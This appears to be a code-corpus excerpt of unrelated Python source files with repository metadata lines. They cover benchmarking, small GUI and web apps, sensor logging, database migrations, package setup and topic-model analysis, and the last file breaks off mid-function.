# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with h5features. If not, see <http://www.gnu.org/licenses/>.
"""Comparing execution times of h5features 1.0 and 1.1 versions."""
import argparse
import timeit
# import cProfile
# import os
from aux import generate
import aux.h5features_v1_0 as h5f
from aux.utils import remove
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--nitems',
help='number of items to generate',
default=10000, type=int)
parser.add_argument('-d', '--dimension',
help='features dimension',
default=20, type=int)
parser.add_argument('-f', '--max_frames',
help='maximal number of frames per items',
default=10, type=int)
parser.add_argument('-n', '--ntimes',
help='number of times each operation is timed',
default=10, type=int)
parser.add_argument('-r', '--repeat',
help='number of repetitions (lowest time is resulted)',
default=3, type=int)
return parser.parse_args()
def timeme(cmd, setup, args):
return min(timeit.repeat(
cmd, setup=setup, number=args.ntimes, repeat=args.repeat))
if __name__ == '__main__':
args = parse_args()
print('Parameters are i={}, d={}, f={}, n={}, r={}'
.format(args.nitems, args.dimension, args.max_frames,
args.ntimes, args.repeat))
data = generate.full_data(args.nitems, args.dimension, args.max_frames)
filename = 'test.h5'
groupname = 'group'
v10_setup = """\
import aux.h5features_v1_0 as h5f
from aux.utils import remove
from __main__ import data, filename, groupname
"""
v10_write = """\
remove(filename)
h5f.write(filename, groupname, data.items(), data.labels(), data.features())
"""
v11_setup = """\
import h5features as h5f
from aux.utils import remove
from __main__ import data, filename, groupname
"""
v11_write = """\
remove(filename)
h5f.Writer(filename).write(data, groupname)
"""
read = "h5f.read(filename, groupname)"
print('Writing:')
print(' 1.0: ', timeme(v10_write, v10_setup, args))
print(' 1.1: ', timeme(v11_write, v11_setup, args))
print('Reading:')
remove(filename)
h5f.write(
filename, groupname, data.items(), data.labels(), data.features())
print(' 1.0: ', timeme(read, v10_setup, args))
print(' 1.1: ', timeme(read, v11_setup, args))
# cProfile.run(v10_setup + '\n' + v10_write, 'stats0')
# remove(data['filename'])
# cProfile.run(v11_setup + '\n' + v11_write, 'stats1')
# remove(data['filename'])
| bootphon/h5features | test/perfs.py | Python | gpl-3.0 | 3,410 |
# encoding: utf-8
import tkinter
class Painter:
def __init__(self, width=1200, height=800, bg='white'):
self.root = tkinter.Tk()
self.canvas = tkinter.Canvas(self.root, width=width, height=height, bd=5)
self.canvas.pack()
def add_point(self, x, y, color, radius):
left_top = (x-radius, y-radius)
right_bottom = (x+radius, y+radius)
# print(color)
color_value = color[0]*0x10000 + color[1]*0x100 + color[0]
color_sign = hex(color_value)[2:]
if len(color_sign) < 6:
tmp = ''
for i in range(6-len(color_sign)):
tmp += '0'
color_sign = tmp + color_sign
color_sign = '#' + color_sign
# print(color_sign)
self.canvas.create_oval(left_top[0],
left_top[1],
right_bottom[0],
right_bottom[1],
fill=color_sign,
width=0
)
def paint_point_list(self, l: list):
for i in l:
self.add_point(i[0], i[1], i[2], i[3]) | neveralso/CompilerAssignment | gui.py | Python | gpl-2.0 | 1,173 |
import Handler, Mdb, Security, Template, Util
from bongo import MDB
def CreateAlias(req):
if not req.fields.has_key('newaliasname'):
return Handler.SendMessage(req, 'Alias CN is required')
if not req.fields.has_key('newaliasref'):
return Handler.SendMessage(req, 'Aliased object is required')
aliasname = req.fields.getfirst('newaliasname').value
aliasref = req.fields.getfirst('newaliasref').value
attributes = {}
attributes[req.mdb.A_ALIASED_OBJECT_NAME] = aliasref
context = mdb.default_context
req.mdb.AddObject(context + '\\' + aliasname, req.mdb.C_ALIAS, attributes)
return Handler.SendMessage(req, 'Alias created successfully')
| bongo-project/bongo | src/libs/python/bongo/admin/Alias.py | Python | gpl-2.0 | 694 |
# encoding: utf-8
import cgi
import json
import logging
import os
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
def ReadDecks():
decks = []
json_dir = os.path.join(os.path.dirname(__file__), "json")
for dirname, dirnames, filenames in os.walk(json_dir):
for filename in filenames:
try:
decks.append(json.loads(open(
os.path.join(dirname, filename), "r").read()))
except Exception:
print "Fail loading flashcard deck %s" % filename
return decks
class MainPage(webapp2.RequestHandler):
def get(self, *args):
decks = ReadDecks()
deck_name = None
if args:
deck_name = args[0]
# user = users.get_current_user()
# login_url = None
# logout_url = None
# if user:
# logout_url = users.create_logout_url('/')
# else:
# login_url = users.create_login_url(self.request.uri) # 'http://www.google.com'
path = os.path.join(os.path.dirname(__file__), 'FlashCardChEng.html')
# Find which deck they want.
deck = None
if deck_name:
valid_decks = [d for d in decks if d["name"] == deck_name]
if valid_decks:
deck = valid_decks[0]
if not deck:
deck = decks[0]
template_args = {
"deck_found": bool(deck),
"content_json": json.dumps(deck["cards"]) if deck else "",
# 'user': user,
# 'login_url': login_url,
# 'logout_url': logout_url,
"deck_names": [d["name"] for d in decks],
}
self.response.out.write(template.render(path, template_args))
application = webapp2.WSGIApplication([
("/", MainPage),
("/(.*)", MainPage),
])
| ebaumstarck/funwebdev | FlashCard/flashcards.py | Python | bsd-3-clause | 1,945 |
# article_selector.py
class ArticleSelector():
"""
This script is designed to set up an experiment by selecting
training, development and test sets out of a large corpus of
articles. The corpus in mind is the Westbury Lab Wikipedia
Corpus.
It randomly chooses n articles out of a set m >= n articles. It
then splits them into the required sets approximating a specified
distribution. m must be known in advance.
The default proportions are 60/20/20%, and the default separating
line is "---END.OF.DOCUMENT---\n", the WestburyLab separator.
"""
def __init__(self, article_file_obj, train_file_obj, devel_file_obj, test_file_obj, article_separation_line="---END.OF.DOCUMENT---\n") :
self.article_file_obj = article_file_obj
self.train_file_obj = train_file_obj
self.devel_file_obj = devel_file_obj
self.test_file_obj = test_file_obj
self.article_separation_line = article_separation_line
def select_and_distribute(self, rand_obj, m, n, proportions=[.6,.2,.2]):
assert sum(proportions) == 1, proportions
selection = rand_obj.sample(xrange(m),n)
slices = [int(n*proportions[0]), int(n*(proportions[0]+proportions[1]))]
training_indices = selection[:slices[0]]
development_indices = selection[slices[0]:slices[1]]
test_indices = selection[slices[1]:]
article_number = 0
article = ''
line = self.article_file_obj.readline()
while line:
while line != self.article_separation_line:
article += line
line = self.article_file_obj.readline()
article += line
line = self.article_file_obj.readline() # blank between articles
article += line
if article_number in selection:
if article_number in training_indices:
self.train_file_obj.write(article)
elif article_number in development_indices:
self.devel_file_obj.write(article)
else:
assert article_number in test_indices
self.test_file_obj.write(article)
article_number += 1
article = ''
line = self.article_file_obj.readline()
return training_indices, development_indices, test_indices
| ambimorph/recluse | recluse/article_selector.py | Python | agpl-3.0 | 2,389 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.errors",
marshal="google.ads.googleads.v9",
manifest={"ConversionActionErrorEnum",},
)
class ConversionActionErrorEnum(proto.Message):
r"""Container for enum describing possible conversion action
errors.
"""
class ConversionActionError(proto.Enum):
r"""Enum describing possible conversion action errors."""
UNSPECIFIED = 0
UNKNOWN = 1
DUPLICATE_NAME = 2
DUPLICATE_APP_ID = 3
TWO_CONVERSION_ACTIONS_BIDDING_ON_SAME_APP_DOWNLOAD = 4
BIDDING_ON_SAME_APP_DOWNLOAD_AS_GLOBAL_ACTION = 5
DATA_DRIVEN_MODEL_WAS_NEVER_GENERATED = 6
DATA_DRIVEN_MODEL_EXPIRED = 7
DATA_DRIVEN_MODEL_STALE = 8
DATA_DRIVEN_MODEL_UNKNOWN = 9
CREATION_NOT_SUPPORTED = 10
UPDATE_NOT_SUPPORTED = 11
__all__ = tuple(sorted(__protobuf__.manifest))
| googleads/google-ads-python | google/ads/googleads/v9/errors/types/conversion_action_error.py | Python | apache-2.0 | 1,543 |
#This script runs a game using basic conditional terminology: conditional/alternative/chained executions, raw_input, type conversions, main functions, rational operators, logical operators, random.randint(), and str.format().
#This is about a game that involves a bomb, where you need to cut the right circuit in order to let the timer stop. Or else, you die.
import random
# RULES
# conditional execution-1
# raw_input
def rules():
print "HI! I MADE THIS GAME! AND I AM BOMIN!"
rulesorno = raw_input("You wanna hear the rules? (yes/no):")
if rulesorno == "yes" or rulesorno == "no":
print "You have to know anyways, so yeah. You CANNOT write in capital letters. ALL of them should be LOWERCASED."
#introduction
# str.format()
# """ """
def intro():
name = raw_input("So. What's your name..?:")
if not name == "Innhye":
print "Hi there..."
out = """Clock is ticking. Patients, doctors, staffs,,,,they are all standing still,
staring at one thing,,,, and it is, a bomb. The countdown has started: 30 seconds remaining... There's no time to spare.
There's a person in the middle, at this hospital full of patients and doctors...tensed up. That person is holding it - everything, EVERYTHING depends on that person.
{}. That's you.""".format(name)
print out
#3. first cut!!!
# chained conditionals -1
def firstcut():
print "You are looking at the bomb right now. There are three circuits attached on the bomb. Right? And, they are: red, blue, and green."
cut1 = raw_input("Type the color of the circuit that you would like to cut:")
if cut1 == "red":
cut1 = 1
return cut1
elif cut1 == "blue":
cut1 = 2
return cut1
elif cut1 == "green":
cut1 = 3
return cut1
#You sure?
# chained conditionals -2
def sureornot(cut1):
if cut1 > 1 and cut1 < 3:
sureornot = raw_input("HA. You sure about that? (yes/no):")
if sureornot == "no":
cut1 = raw_input("you're not...?? Type the color again...:")
if cut1 == "red":
cut1 = 1
return cut1
elif cut1 == "blue":
cut1 = 2
return cut1
elif cut1 == "green":
cut1 = 3
return cut1
else:
return cut1
#4. dead or alive???!!!
# alternative execution -1
def deadoralive1(cut1, explosion):
if str(cut1) == explosion:
print "BOOM. YOU'RE DEAD."
exit()
else:
print "YAAASSSSS YOU ARE ALIVE. YAS YAS BUT BUT THE BOMB THOUGH. the timer's still running.....!"
#5. second cut!!!!!!!
# chained conditionals-3
#conditional execution-2
def secondcut(explosion):
print "\nNow you have two circuits left. One will stop the timer, and another one will make it explode...what's your choice?"
cut2 = raw_input("Type the color of the circuit that you would like to cut, ALL IN LOWER CASE:")
if cut2 > int(explosion) or cut2 < int(explosion) or cut2 == int(explosion):
sureornot = raw_input("HA. You sure about that? (yes/no):")
if sureornot == "yes" or sureornot == "no":
cut2 = raw_input("NO YOU'RE NOT. OF COURSE YOU AREN'T SURE... Type the color again...:")
if cut2 == "red":
cut2 = 1
elif cut2 == "blue":
cut2 = 2
elif cut2 == "green":
cut2 = 3
#6. deadoralive 2!!!!
# alternative execution -2
def deadoralive2(cut2, explosion):
if str(cut2) == explosion:
print "BOOM. YOU'RE DEAD."
else:
print "The timer. is. stopped. YOU'RE ALIVE! EVERYONE IS ALIVE! GOOD JOB!!!"
#main
# type conversion
# random.randint
def main():
import random
explosion = str(random.randint(1, 3))
rules()
intro()
cut1 = firstcut()
sureornot(cut1)
deadoralive1(cut1, explosion)
cut2 = secondcut(explosion)
deadoralive2(cut2, explosion)
main()
| bomin2406-cmis/bomin2406-cmis-cs2 | conditionals.py | Python | cc0-1.0 | 3,685 |
#!/usr/bin/python3
import os
import sys
import datetime
import time
try:
import board
import busio
import adafruit_ccs811
except:
print("ccs811 module not installed, install using the gui")
sys.exit()
homedir = os.getenv("HOME")
sensor_log = homedir + "/Pigrow/logs/persistCCS811.txt"
'''
# Currently no settings file information is stored for consistent sensors
sys.path.append(homedir + '/Pigrow/scripts/')
try:
import pigrow_defs
except:
print("pigrow_defs.py not found, unable to continue.")
print("make sure pigrow software is installed correctly")
sys.exit()
loc_dic = pigrow_defs.load_locs(homedir + '/Pigrow/config/dirlocs.txt')
pigrow_settings = pigrow_defs.load_settings(loc_dic['loc_settings'])
'''
# set up and read the sensor
print("Initalising CCS811 sensor")
i2c = busio.I2C(board.SCL, board.SDA)
ccs811 = adafruit_ccs811.CCS811(i2c)
# Wait for the sensor to be ready
while not ccs811.data_ready:
time.sleep(0.1)
pass
# Wait some more for a valid reading after it's initalised
time.sleep(10) # this value is a guess
class sensor_config():
# find connected sensors
def find_settings():
print("connection_type=i2c")
print("connection_address_list=0x5a")
print("default_connection_address=0x5a")
def read_sensor(location="", extra="", sensor_name="", *args):
print("Reading Sensor...")
# start read attempts
read_attempt = 1
co2 = None
while read_attempt < 5:
try:
test_data = []
# second test val
test_val = 0
y = 0
min = 99999999999
max = 0
for x in range(0, 50):
co2 = ccs811.eco2
if not co2 == 0:
y = y + 1
test_val = test_val + co2
if max < co2:
max = co2
if min > co2:
min = co2
time.sleep(0.25)
test_val = round(test_val / y, 2)
v_range = max - min
test_data.append(["co2_ave", test_val])
test_data.append(["co2_ave_range", v_range])
test_data.append(["co2_ave_datapoints", y])
# test again
test2_val = 0
y = 0
for x in range(0, 50):
co2 = ccs811.eco2
if not co2 == 0:
y = y + 1
test2_val = test2_val + co2
time.sleep(0.25)
test2_val = round(test2_val / y, 2)
#print("after delay value ", test2_val)
test_data.append(["co2_ave_2", test2_val])
# final read and log single entry
co2 = ccs811.eco2
tvoc = ccs811.tvoc
if co2 == "None":
print("--problem reading CCS811, try " + str(read_attempt))
time.sleep(2)
read_attempt = read_attempt + 1
else:
logtime = datetime.datetime.now()
data = [['time',logtime], ['co2_spot', co2], ['tvoc_spot',tvoc]]
data = data + test_data
#print(data)
return data
except Exception as e:
print("--exception while reading CCS811, try " + str(read_attempt))
print(" -- " + str(e))
time.sleep(2)
read_attempt = read_attempt + 1
return None
if __name__ == '__main__':
'''
The CCS811 requires no configureation
'''
# check for command line arguments
sensor_location = "0x5a"
for argu in sys.argv[1:]:
if "=" in argu:
thearg = str(argu).split('=')[0]
thevalue = str(argu).split('=')[1]
if thearg == 'location':
sensor_location = thevalue
elif 'help' in argu or argu == '-h':
print(" Constant loop for the CCS811 Sensor")
print(" ")
print(" For best results the ccs811 should be run on a ")
print(" constant loop, add this script to the startup cron")
print("")
print(" -config ")
print(" display the config information")
print("")
sys.exit(0)
elif argu == "-flags":
print("location=")
sys.exit(0)
elif argu == "-config":
sensor_config.find_settings()
sys.exit()
# read sensor
while True:
sensor_values = read_sensor(location=sensor_location)
if sensor_values == None:
print("!! Failed to read five times !!")
# shold write to the error log here
time.sleep(1)
else:
line = ""
for x in sensor_values:
line = line + str(x[0]) + "=" + str(x[1]) + ">"
line = line[:-1] + "\n"
with open(sensor_log, "a") as f:
f.write(line)
time.sleep(47.5) # the process has about 12.5 seconds of delays in it already
| Pragmatismo/Pigrow | scripts/persistent_sensors/persistent_ccs811.py | Python | gpl-3.0 | 5,035 |
#!/usr/bin/python
# coding: UTF-8
import os
import sys
import urllib2
import partner_pb2
if len(sys.argv) != 2:
print "input url"
sys.exit(0)
url = (sys.argv[1])
all_the_text = urllib2.urlopen(url=url).read()
req = partner_pb2.PartnerData()
req.ParseFromString(all_the_text)
print "attrs"
for ite in req.attrs:
if ite.id == 89:
print "体质: %s" % (ite.val)
if ite.id == 91:
print "敏捷: %s" % (ite.val)
| tsdfsetatata/xserver | Server/dump_srv/show_partner2.py | Python | gpl-3.0 | 457 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""security converge dashboards
Revision ID: 1f6dca87d1a2
Revises: 4b84f97828aa
Create Date: 2020-12-11 11:45:25.051084
"""
# revision identifiers, used by Alembic.
revision = "1f6dca87d1a2"
down_revision = "4b84f97828aa"
from alembic import op
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm import Session
from superset.migrations.shared.security_converge import (
add_pvms,
get_reversed_new_pvms,
get_reversed_pvm_map,
migrate_roles,
Pvm,
)
NEW_PVMS = {"Dashboard": ("can_read", "can_write",)}
PVM_MAP = {
Pvm("DashboardModelView", "can_add"): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_delete"): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_download_dashboards",): (
Pvm("Dashboard", "can_read"),
),
Pvm("DashboardModelView", "can_edit",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_favorite_status",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_list",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_show",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "muldelete",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelViewAsync", "can_list",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelViewAsync", "muldelete",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelViewAsync", "mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("Dashboard", "can_new",): (Pvm("Dashboard", "can_write"),),
}
def upgrade():
bind = op.get_bind()
session = Session(bind=bind)
# Add the new permissions on the migration itself
add_pvms(session, NEW_PVMS)
migrate_roles(session, PVM_MAP)
try:
session.commit()
except SQLAlchemyError as ex:
print(f"An error occurred while upgrading permissions: {ex}")
session.rollback()
def downgrade():
bind = op.get_bind()
session = Session(bind=bind)
# Add the old permissions on the migration itself
add_pvms(session, get_reversed_new_pvms(PVM_MAP))
migrate_roles(session, get_reversed_pvm_map(PVM_MAP))
try:
session.commit()
except SQLAlchemyError as ex:
print(f"An error occurred while downgrading permissions: {ex}")
session.rollback()
pass
| mistercrunch/panoramix | superset/migrations/versions/1f6dca87d1a2_security_converge_dashboards.py | Python | apache-2.0 | 3,258 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{ 'name': 'Turkey - Accounting',
'version': '1.beta',
'category': 'Localization/Account Charts',
'description': """
Türkiye için Tek düzen hesap planı şablonu OpenERP Modülü.
==============================================================================
Bu modül kurulduktan sonra, Muhasebe yapılandırma sihirbazı çalışır
* Sihirbaz sizden hesap planı şablonu, planın kurulacağı şirket,banka hesap bilgileriniz,ilgili para birimi gibi bilgiler isteyecek.
""",
'author': 'Ahmet Altınışık',
'maintainer':'https://launchpad.net/~openerp-turkey',
'website':'https://launchpad.net/openerp-turkey',
'depends': [
'account',
'base_vat',
'account_chart',
],
'init_xml': [],
'update_xml': [
'account_code_template.xml',
'account_tdhp_turkey.xml',
'account_tax_code_template.xml',
'account_chart_template.xml',
'account_tax_template.xml',
'l10n_tr_wizard.xml',
],
'demo_xml': [],
'installable': True,
'images': ['images/chart_l10n_tr_1.jpg','images/chart_l10n_tr_2.jpg','images/chart_l10n_tr_3.jpg'],
'certificate': '0065141563693',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| ksrajkumar/openerp-6.1 | openerp/addons/l10n_tr/__openerp__.py | Python | agpl-3.0 | 2,237 |
import asyncio
import multiprocessing
import time
from indy_common.constants import POOL_RESTART, RESTART_MESSAGE
from indy_node.test.pool_restart.helper import compose_restart_message, \
send_restart_message
from stp_core.loop.eventually import eventually
from indy_node.test.upgrade.helper import NodeControlToolExecutor as NCT, \
nodeControlGeneralMonkeypatching
m = multiprocessing.Manager()
whitelist = ['Unexpected error in _restart test']
def test_node_control_tool_restart(looper, tdir, monkeypatch, tconf):
received = m.list()
msg = RESTART_MESSAGE
stdout = 'teststdout'
def transform(tool):
nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout)
monkeypatch.setattr(tool, '_process_data', received.append)
def check_message():
assert len(received) == 1
assert received[0] == compose_restart_message(msg)
nct = NCT(backup_dir=tdir, backup_target=tdir, transform=transform)
try:
send_restart_message(msg)
looper.run(eventually(check_message))
finally:
nct.stop()
def test_communication_with_node_control_tool(looper, tdir, tconf, monkeypatch):
received = m.list()
msg = RESTART_MESSAGE
stdout = 'teststdout'
def transform(tool):
nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout)
monkeypatch.setattr(tool, '_restart', restart_count)
def check_restart_count():
assert len(received) == 1
def restart_count():
received.append(RESTART_MESSAGE)
nct = NCT(backup_dir=tdir, backup_target=tdir, transform=transform)
try:
send_restart_message(msg)
looper.run(eventually(check_restart_count))
finally:
nct.stop()
| spivachuk/sovrin-node | indy_node/test/pool_restart/test_node_control_tool_for_restart.py | Python | apache-2.0 | 1,740 |
# adapted from the application skeleton in the sdk
import e32
import appuifw
import location
import struct
import socket
import threading
class gsm_location :
def __init__(self) :
self.text = u""
self.noRefresh = 0;
def gsm_location(self) :
self.noRefresh = self.noRefresh + 1;
try:
(self.mcc, self.mnc, self.lac, self.cellid) = location.gsm_location()
except:
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cellid = 0
self.text = u"MCC: %s\nMNC: %s\nLAC: %s\nCell id: %s\nnoSamples: %i\n" % (self.mcc, self.mnc, self.lac, self.cellid, self.noRefresh)
return self.text
def close(self) :
pass
e32.ao_yield()
class Client(threading.Thread):
def __init__(self, app):
threading.Thread.__init__(self)
try:
print('Starting up Socket ')
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serversocket.bind(("localhost", 59721))
self.serversocket.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.serversocket.listen(1)
except socket.error, msg:
self.serversocket = None
print('Failed ' + str(msg));
self.app = app
self.exit_flag = 0
def run(self):
while not self.exit_flag:
print('Waiting for socket connection')
(clientsocket, address) = self.serversocket.accept()
print('Got connection!')
try:
while 1:
cmdS = ''
while len(cmdS) < 4:
chunk = clientsocket.recv(4);
cmdS = cmdS + chunk
print('Cmd receivedd so far: ' + str(len(cmdS)) + ' ' + cmdS)
if len(chunk) == 0:
raise socket.error, "socket connection broken"
cmd = struct.unpack('>i',cmdS)
if (cmd[0] == 6574723):
signal = 0;
msg = struct.pack('>iiiih', self.app.db.mcc, self.app.db.mnc, self.app.db.lac, self.app.db.cellid, signal) + '\n'
totalsent = 0
msglen = len(msg)
while totalsent < msglen:
sent = clientsocket.send(msg[totalsent:])
if sent == 0:
raise socket.error, "socket connection broken"
totalsent = totalsent + sent
except socket.error, msg:
clientsocket = None
self.exit_flag = 0
class gsm_location_app:
def __init__(self):
self.lock = e32.Ao_lock()
self.old_title = appuifw.app.title
appuifw.app.title = u"GSM Location"
self.exit_flag = False
appuifw.app.exit_key_handler = self.abort
self.db = gsm_location()
appuifw.app.body = appuifw.Text()
appuifw.app.menu = [(u"Refresh", self.refresh)]
def loop(self):
try:
self.refresh()
e32.ao_sleep(1)
while not self.exit_flag:
self.refresh()
e32.ao_sleep(1)
finally:
self.db.close()
def close(self):
appuifw.app.menu = []
appuifw.app.body = None
appuifw.app.exit_key_handler = None
appuifw.app.title = self.old_title
def abort(self):
# Exit-key handler.
self.exit_flag = True
self.lock.signal()
def refresh(self):
self.db.gsm_location()
appuifw.app.body.set(self.db.text)
def main():
app = gsm_location_app()
c = Client(app)
c.start()
try:
app.loop()
finally:
app.close()
if __name__ == "__main__":
main()
| papousek/GpsMid | S60cellID_helper.py | Python | gpl-2.0 | 3,251 |
#from . import mod
from .comp1 import CONF
from .comp2 import CONF
| simone-campagna/daikon | test_zirkon/pack4/__init__.py | Python | apache-2.0 | 68 |
#!/usr/bin/env python
# encoding: utf-8
from django import template
register = template.Library()
@register.filter(name='yes_no')
def yes_no(bool_value, show_str):
if bool_value:
return show_str.partition('/')[0]
else:
return show_str.partition('/')[2]
| its-django/mysite-django18 | mysite/restaurants/templatetags/myfilters.py | Python | apache-2.0 | 281 |
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-mgmt-maintenance"
PACKAGE_PPRINT_NAME = "Maintenance Management"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, 'version.py')
if os.path.exists(os.path.join(package_folder_path, 'version.py'))
else os.path.join(package_folder_path, '_version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.md', encoding='utf-8') as f:
readme = f.read()
with open('CHANGELOG.md', encoding='utf-8') as f:
changelog = f.read()
setup(
name=PACKAGE_NAME,
version=version,
description='Microsoft Azure {} Client Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + changelog,
long_description_content_type='text/markdown',
license='MIT License',
author='Microsoft Corporation',
author_email='[email protected]',
url='https://github.com/Azure/azure-sdk-for-python',
keywords="azure, azure sdk", # update with search keywords relevant to the azure service / product
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=[
'tests',
# Exclude packages that will be covered by PEP420 or nspkg
'azure',
'azure.mgmt',
]),
install_requires=[
'msrest>=0.6.21',
'azure-common~=1.1',
'azure-mgmt-core>=1.3.0,<2.0.0',
],
python_requires=">=3.6"
)
| Azure/azure-sdk-for-python | sdk/maintenance/azure-mgmt-maintenance/setup.py | Python | mit | 2,678 |
from sys import exit, stderr, argv
from collections import defaultdict, Counter
import json
import random
def parse_mallet_topics(fname) :
tmp = []
with open(fname) as f :
for line in f :
tmp.append(line.strip().split('\t')[2:])
return tmp
def parse_mallet_topics_annotated(fname) :
tmp = []
with open(fname) as f :
for line in f :
dat = line.strip().split('\t')
tmp.append((dat[0], dat[3:]))
return tmp
def parse_mallet_articles(fname) :
tmp = defaultdict(list)
with open(fname) as f :
f.readline() # header
linenum = 2
for line in f :
data = line.strip().split("\t")
article = int(data[0])
for i in range(2, len(data), 2) :
try :
topic_id = int(data[i])
topic_prob = float(data[i+1])
tmp[article].append((topic_id, topic_prob))
except ValueError, ve :
print >> stderr, "Error on line %d (%s)" % (linenum, str(ve))
exit(1)
linenum += 1
return tmp
def main() :
verbose = False
if len(argv) != 4 :
print >> stderr, "Usage %s <key file> <composition file> <n>"
print >> stderr, "\t we assume that the key file has an additional column prepended of human annotations"
print >> stderr, "\t n = number of docs to print out"
exit(1)
key_file = argv[1]
composition_file = argv[2]
num_to_print = int(argv[3])
# arxiv_topics = json.load(open("../linrel_topics.json"))
# print "read %d arxiv articles+topics" % len(arxiv_topics)
#
# machine_learning_articles = [ a for a in arxiv_topics if 'stat.ML' in arxiv_topics[a] ]
# print "\t%d/%d arxiv articles are from stat.ML" % (len(machine_learning_articles), len(arxiv_topics))
#mallet_topics = parse_mallet_topics("80000keys.txt")
mallet_topics = parse_mallet_topics_annotated(key_file)
if verbose :
print "read %d mallet topics" % len(mallet_topics)
ambiguous_topics = [ index for index,value in enumerate(mallet_topics) if 'ambiguous' in value[0] ]
if verbose :
print "\t%d/%d mallets topics were ambiguous" % (len(ambiguous_topics), len(mallet_topics))
mallet_articles = parse_mallet_articles(composition_file)
if verbose :
print "read %d mallet articles" % len(mallet_articles)
# ml_topics = Counter()
#
# for mla in machine_learning_articles :
# topic_id, topic_prob = mallet_articles[mla][0]
# ml_topics[topic_id] += 1
#
# print "%d/%d topics are related to articles from stat.ML" % (len(ml_topics), len(mallet_topics))
# ml_filename = 'machine_learning_topics.txt'
#
# with open(ml_filename, 'w') as f :
# for t in ml_topics :
# print >> f, " ".join([ str(t), str(ml_topics[t]) ] + mallet_topics[t][1])
#
# print "wrote %s" % ml_filename
article2topic = {}
topic_choice = []
for aid in sorted(mallet_articles.keys()) :
for index,value in enumerate(mallet_articles[aid]) :
tid,tprob = value
if tid not in ambiguous_topics :
article2topic[aid] = tid
topic_choice.append(index)
break
if verbose :
for i in sorted(set(topic_choice)) :
print "\t%d/%d mallet articles were assigned %d-th topic" % (topic_choice.count(i), len(mallet_articles), i)
article_and_query = []
weak_topics = ('probability', 'inference', 'vision', 'theory', 'optimisation', 'dimensionality', 'likelihood', 'speech')
for article,topic in article2topic.items() :
topic = mallet_topics[topic][0]
